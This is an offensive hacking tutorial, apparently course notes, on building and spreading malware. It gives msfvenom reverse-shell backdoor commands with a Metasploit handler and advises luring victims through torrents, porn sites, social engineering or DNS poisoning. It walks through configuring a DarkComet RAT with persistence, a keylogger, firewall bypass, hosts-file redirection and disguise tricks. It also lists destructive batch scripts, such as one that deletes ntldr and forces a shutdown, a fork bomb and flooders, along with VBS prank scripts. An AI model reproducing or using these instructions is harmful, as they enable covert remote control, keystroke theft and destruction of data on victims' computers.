Practical No 1: Creating a windows backdoored executable to maintain continues access.
Step 1: execute the following command in your kali linux machine new terminal window.
msfvenom –p windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -f exe
–o filename.exe
For Linux follow the below command
msfvenom –p linux/x86/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=<attacker PORT> -f elf –o
linuxback.elf
Now somehow you have to send this file to the victim machine
Methods to send the file:
1) If you already have a meterpreter connection from the target you can use upload command to
upload this backdoor file to the target machine.
2) If you don’t have any connection to upload it remotely you have to keep this file as a torrent or
a porn content so whoever visits your page he will download and install the file so he will get
infected. (Torrents and Porn are most convincing places where people will get infected.)
3) Or you can keep your own webserver to host the vulnerable file when victim comes to your site
he can download the malware, you can use social engineering to attract victim towards your
website.
Chinni Diwakar 1
� 4) Or you can perform network MITM attacks or DNS poisoning attacks to redirect victim towards
you.
Here for the practical iam using 3rd option own file hosting.
For that I need to move this file to webserver location and I have to start the webserver
After sending the file you need to start a receiver to control the connection.
Starting a Handler Using Metasploit.
Step 1: type the below mentioned commands one after another in blank terminal
service postgresql start
Msfconsole
Chinni Diwakar 2
�after the above commands you will get a prompt like msf>
inside of the msf prompt you need to execute few more commands, just follow
use multi/handler
Chinni Diwakar 3
�set PAYLOAD <the payload you have chosen for msfvenom>
set LHOST <attacker ip given in the msfvenom>
set LPORT <attacker port given in the msfvenom>
show option (to see the configured settings)
exploit
Chinni Diwakar 4
�Now as soon as the target downloads and runs the file you can get meterpreter connection on your
attacker machine.
You can execute meterpreter commands to control the target.
Chinni Diwakar 5
�Practical No 2: Creating Darkcomet Trojan to infect windows machines.
Download Darkcomet RAT from internet
Create an account in NOIP.com and download the Dynamic Update Client.
Disable you malware defences before proceeding to the given practical (and also firewall).
After downloading darkcomet extract that. You can find an exe application named darkcomet.exe
Double click on that to launch the darkcomet RAT creater.
Chinni Diwakar 6
�Once you double click on the application software you can see the below given image.
Chinni Diwakar 7
�From the above screen click on the top left cornor darkcomet-RAT button and select server module and
click on full editor.
You will the below image, where you can configure your new Trojan.
From the above screen please click on the security password and enter some password so that you can
only control that bots.
Under process mutex please click on random button to create a random mutex id or you can write your
own.
Chinni Diwakar 8
�Give some server ID and also a profile name so that you can identify the Trojan and the settings very
easily among others.
After that please select Active FWB to bypass the firewalls.
By that one settings under general will be completed.
Please click on the network settings to move towards next section of options.
Here on the network settings all you have to do is give your IP address (or Domain name) to get reverse
connection (you can use noip), and also give port number of your choice. Then click on add button.
Chinni Diwakar 9
�Under module startup we have several settings to start our Trojan to select them please check the box
start the stub with windows. And select the location you want to send your Trojan on the victim
machine, the name and folder name, do you want to hide or not everything whatever you want select
them.
Melt after first execution -> gets deleted after Trojan executed successfully.
Persistence installation -> even if you try to delete it comes back always.
You can change the file creation date with the second option as well.
You can make the drop file and parent folder attributes hide and system if you want.
Chinni Diwakar 10
�By checking the box on display a message box option, you can show a fake error message on the victim
PC as soon as the victim executes the Trojan, like above shown.
Chinni Diwakar 11
�Under Module Shield section you can select as many settings as you want to protect your Trojan file.
Chinni Diwakar 12
�Under key logger section you have to make sure that the active offline key logger is checked. If you have
a FTP server you can also try to get logs immediately through FTP server by giving details (if you want.).
Under hosts file section you can do DNS poisoning by playing with target hosts file like shown above,
There iam redirecting all facebook.com traffic towards the IP address I mentioned above. You have to
click on addline.
Chinni Diwakar 13
�As we don’t have specific working plugins outsite no need to consider about this add plugins section.
Chinni Diwakar 14
�Under file binder click on yellow color folder icon and select the file you want to bind (attach) then click
on add file button. So when the victim clicks on the Trojan they can see the attached file opening, so
that they won’t get doubt.
Chinni Diwakar 15
�Under custom icon section select custom icon and select the icon you wish to add to your Trojan so that
it will look good to the victim.
Chinni Diwakar 16
�Under the last stub finalization section you can select the output extension name and compression
method then click on build the stub button, then save the Trojan with your favorite name.
Finally Trojan created, now we need to do some client settings.
Goto the fourth tab of darkcomet socket/net
And rightclick and select addport to listen and give the port number you want, and click listen.
Chinni Diwakar 17
�Then click on the darkcomet rat blue button then select client settings tab and provide password you
kept on the starting of the Trojan creation.
Chinni Diwakar 18
�You can watch the full video demonstration below.
Chinni Diwakar 19
�Virus Creation with Batch file programming:
File Flooder virus
@echo off
cd c:\Documents and Settings\%user%\Desktop\
:loop
echo hacked by hacker > hacked%random%
goto loop
Folder flooder virus
@echo off
cd c:\Documents and Settings\%user%\Desktop\
md folder
cd folder
:loop
md hacked%random%g
goto loop
Chinni Diwakar 20
�Program Flooder virus
@echo off
:loop
start explorer.exe
start notepad.exe
start calc.exe
start mspaint.exe
start cmd.exe
goto loop
Message annoyer virus
@echo off
:loop
msg * a
msg * b
msg * c
msg * d
msg * e
msg * f
msg * g
goto loop
Fork Bombing Virus
@echo off
:loop
Explorer.exe
call fork.bat
goto loop
Chinni Diwakar 21
�OS crash virus
@echo off
cd C:\
attrib –s –h –r ntldr
del ntldr
shutdown –c “Hacked By Hacker” –t 3 –s –F
Save the above code snippets with .bat file extension file type as allfiles.
And execute them to see results.
Virus Creation with Visual Basics Scripting
Copy the following codes in notepad and save as allfiles type and extention as .vbs.
Speak Virus
CreateObject("SAPI.SpVoice").Speak"I Kill You"
Scary Prank Virus (Fun virus no damage)
Chinni Diwakar 22
�Set WshShell = WScript.CreateObject("WScript.Shell")
strName = wshShell.ExpandEnvironmentStrings( "%USERNAME%" )
x=msgbox ("Critical: Your system is severely affected by multiple threats.. To abort all processes, press
'Abort'. To Scan again, press 'Retry'. To continue all processes, click 'Ignore'." ,2+16, "Virus found by
Windows Defender©")
WScript.sleep 2000
msgbox "Sytem failure in %WINDIR%",48,ERROR
WshShell.Run "cmd"
WScript.sleep 200
wshshell.sendkeys "cls"
WScript.sleep 200
wshshell.sendkeys "{ENTER}"
WScript.sleep 200
wshshell.sendkeys "A"
WScript.sleep 200
wshshell.sendkeys "r"
WScript.sleep 200
wshshell.sendkeys "e"
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "y"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
Chinni Diwakar 23
�wshshell.sendkeys "u"
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "s"
WScript.sleep 200
wshshell.sendkeys "c"
WScript.sleep 200
wshshell.sendkeys "a"
WScript.sleep 200
wshshell.sendkeys "r"
WScript.sleep 200
wshshell.sendkeys "e"
WScript.sleep 200
wshshell.sendkeys "d"
WScript.sleep 200
wshshell.sendkeys ","
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys strName
WScript.sleep 200
wshshell.sendkeys "?"
x=msgbox ("?",4)
wshshell.sendkeys "{ENTER}"
wshshell.sendkeys "cls"
wshshell.sendkeys "{ENTER}"
if x=6 Then
WScript.sleep 200
Chinni Diwakar 24
�wshshell.sendkeys "G"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "d"
WScript.sleep 200
wshshell.sendkeys ","
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "y"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "u"
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "s"
WScript.sleep 200
wshshell.sendkeys "h"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "u"
WScript.sleep 200
wshshell.sendkeys "l"
Chinni Diwakar 25
�WScript.sleep 200
wshshell.sendkeys "d"
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "b"
WScript.sleep 200
wshshell.sendkeys "e"
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 200
wshshell.sendkeys "."
wshshell.sendkeys "{ENTER}"
WScript.sleep 100
wshshell.sendkeys "exit"
WScript.sleep 100
wshshell.sendkeys "{ENTER}"
End If
if x=7 Then
WScript.sleep 200
wshshell.sendkeys "N"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "?"
WScript.sleep 500
Chinni Diwakar 26
�wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 200
wshshell.sendkeys "Y"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "u"
WScript.sleep 200
wshshell.sendkeys " "
WScript.sleep 200
wshshell.sendkeys "s"
WScript.sleep 200
wshshell.sendkeys "h"
WScript.sleep 200
wshshell.sendkeys "o"
WScript.sleep 200
wshshell.sendkeys "u"
WScript.sleep 200
wshshell.sendkeys "l"
WScript.sleep 200
wshshell.sendkeys "d"
WScript.sleep 200
wshshell.sendkeys " "
Chinni Diwakar 27
�WScript.sleep 200
wshshell.sendkeys "b"
WScript.sleep 200
wshshell.sendkeys "e"
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 200
wshshell.sendkeys "."
WScript.sleep 400
wshshell.sendkeys "{ENTER}"
WScript.sleep 100
wshshell.sendkeys "exit"
WScript.sleep 100
wshshell.sendkeys "{ENTER}"
End If
WshShell.Run "cmd"
WScript.sleep 500
wshshell.sendkeys "dir"
WScript.sleep 100
wshshell.sendkeys "{ENTER}"
WScript.sleep 1000
wshshell.sendkeys "dir"
WScript.sleep 100
wshshell.sendkeys "{ENTER}"
WScript.sleep 2000
wshshell.sendkeys "cls"
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
Chinni Diwakar 28
�WScript.sleep 40
wshshell.sendkeys "prompt deleting cookies..."
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
WScript.sleep 40
wshshell.sendkeys "cls"
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
WScript.sleep 2000
wshshell.sendkeys "prompt deleting Users..."
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
WScript.sleep 40
wshshell.sendkeys "cls"
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
WScript.sleep 2000
wshshell.sendkeys "prompt deleting drive 'C:'..."
WScript.sleep 200
wshshell.sendkeys "{ENTER}"
WScript.sleep 40
wshshell.sendkeys "cls"
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
WScript.sleep 1000
x=msgbox ("Are you sure that you want to permanently delete all directories, files, and subfiles in
environment variable: '%ALLDATA%' ? " ,4+32, "C:\")
WScript.sleep 2000
Chinni Diwakar 29
�wshshell.sendkeys "prompt deleting system 32..."
WScript.sleep 70
wshshell.sendkeys "{ENTER}"
WScript.sleep 40
wshshell.sendkeys "cls"
WScript.sleep 40
wshshell.sendkeys "{ENTER}"
WScript.sleep 1000
wshshell.sendkeys "exit"
WScript.sleep 200
wshshell.sendkeys "{ENTER}"
WScript.sleep 4000
msgbox "Just kidding :)"
Disco Keyboard Virus
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
Enter Flood Virus
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Chinni Diwakar 30
�Chain Lights Virus
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop
Copy the above given codes into a notepad file and save with .vbs extension name and type as allfiles.
Chinni Diwakar 31
�Malware Creation with Construction Kits:
Chinni Diwakar 32
�All you have to do is select the function you want and give the virus name, that’s it.
Chinni Diwakar 33
